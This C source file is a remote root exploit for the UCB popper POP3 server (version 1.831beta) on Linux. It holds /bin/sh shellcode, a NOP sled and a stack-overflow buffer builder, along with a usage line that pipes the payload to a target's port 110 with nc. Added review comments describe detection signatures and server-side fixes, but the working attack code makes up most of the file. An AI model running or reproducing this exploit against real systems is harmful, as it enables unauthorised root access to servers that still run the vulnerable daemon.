- /*
- * Remote root exploit for UCB popper on Linux
- *
- * sk8@lucid-solutions.com
- * http://www.lucid-solutions.com
- *
- * Usage: ( ./linux-ucb 0 ; cat ) | nc your.host.com 110
- * Try adjusting offsets by 100.
- *
- * Tested on UCB Pop server (version 1.831beta)
- *
- * I figure it's safe to release this since UCB is not that
- * common anymore. But if you are still running it on your
- * system(s), you had better upgrade. This program shows you
- * why.
- *
- */
-
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <sys/errno.h>
-
- /*
- * Linux x86 shellcode: raw 32-bit machine code ending in the literal
- * path "/bin/sh". The two \xcd\x80 pairs encode `int 0x80`, the 32-bit
- * Linux system-call instruction.
- * NOTE(review): not disassembled here; it presumably starts that shell
- * and then exits -- confirm before relying on this description.
- * Detection: POP3 commands are short printable ASCII, so these bytes
- * arriving in a client line on port 110 are a strong indicator.
- */
- char *shell=
- "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
- "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
- "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
- "\xff\xff/bin/sh";
-
- /*
- * ADDR   - hard-coded address; NOTE(review): looks like a guess at a
- *          stack location in the server process. That only holds where
- *          the stack is at a fixed, executable location, so stack
- *          randomisation (ASLR) and non-executable stacks (NX) break it.
- * OFFSET - default adjustment added to the value derived from ADDR.
- * BUFLEN - size in bytes of the buffer that main() fills.
- */
- #define ADDR 0xbffff1d8
- #define OFFSET 0
- #define BUFLEN 1100
- /* buffer: the generated line. offset: OFFSET unless argv[1] overrides it in main(). */
- char buffer[BUFLEN];
- int offset=OFFSET;
-
- /*
- * Fill the global buffer with one BUFLEN-byte line and print it on
- * stdout; the usage line in the file header pipes that output to a
- * POP3 service on port 110.
- *
- * argv[1], if present, replaces the default offset. It is parsed with
- * atoi, so non-numeric input becomes 0 without any error. More than one
- * argument prints the usage text and exits with status 0.
- *
- * NOTE(review): the layout (padding, code, repeated address) is that of
- * a classic stack-overflow input, presumably aimed at a fixed-size
- * buffer in the server's line handling -- the server code is not shown.
- * The durable fix is on the server: bounded reads of client lines and
- * retiring the affected daemon (the header names UCB popper
- * 1.831beta), with stack protectors, NX and ASLR as hardening layers.
- */
- int main (int argc, char *argv[])
- {
- int i;
-
- if(argc > 2)
- {
- printf("Usage: %s [offset]\n",argv[0]);
- exit(0);
- }
- if(argc==2)
- offset=atoi(argv[1]);
-
- /*
- * Set up the buffer.
- * Resulting layout: 0x90 padding, then the shellcode ending at index
- * BUFLEN-200, then one 32-bit value repeated up to index BUFLEN-5,
- * then a newline in the last byte.
- * Detection: on the wire this is a single line of roughly BUFLEN
- * bytes, mostly 0x90, far longer than a normal POP3 command; a
- * length or non-ASCII check on port 110 traffic will flag it.
- */
- memset(buffer,0x90,BUFLEN); /* 0x90 is the x86 NOP opcode; everything starts as padding */
- memcpy(buffer+BUFLEN-200-strlen(shell),shell,strlen(shell)); /* copy ends at index BUFLEN-200 */
- for(i=BUFLEN-200+1;i<BUFLEN-4;i+=4) /* every 4th index from BUFLEN-199 */
- *(int *)&buffer[i]=ADDR-BUFLEN+100+offset; /* same value each pass: ADDR-BUFLEN+100+offset */
- buffer[BUFLEN-1]='\n'; /* final byte ends the line */
-
- printf("%s\n", buffer); /* result goes to stdout only; no network code in this file */
- }
- /* www.hack.co.za [2000]*/